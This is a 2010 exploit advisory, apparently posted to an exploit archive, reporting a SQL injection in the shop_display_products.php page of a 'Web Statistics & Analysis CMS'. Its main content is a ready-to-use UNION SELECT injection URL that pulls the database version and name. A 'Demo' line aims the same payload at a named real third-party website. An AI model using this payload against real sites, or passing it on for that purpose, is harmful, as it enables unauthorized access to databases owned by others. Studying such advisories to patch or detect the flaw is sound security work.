Web Statistics and Analysis CMS suffers from a remote SQL injection vulnerability.
5cbb613c88249baa23fabcca52ea445779c42f9e2bd6d5bdec8bbaa8ca8d9061
In The Name Of GOD
[+] Exploit Title: Web Statistics & Analysis CMS SQL Injection Vulnerability
[+] Date: 2010-11-14
[+] Author : Cru3l.b0y
[+] Software Link: http://techscape.co.id/market/
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
http://target/path/shop_display_products.php?cat_id=-1+union+select+concat(version(),0x3a,database()),2,3,4,5,6,7,8--
[+] Demo: http://www.agrifam.com/shop_display_products.php?cat_id=-1+union+select+concat(version(),0x3a,database()),2,3,4,5,6,7,8--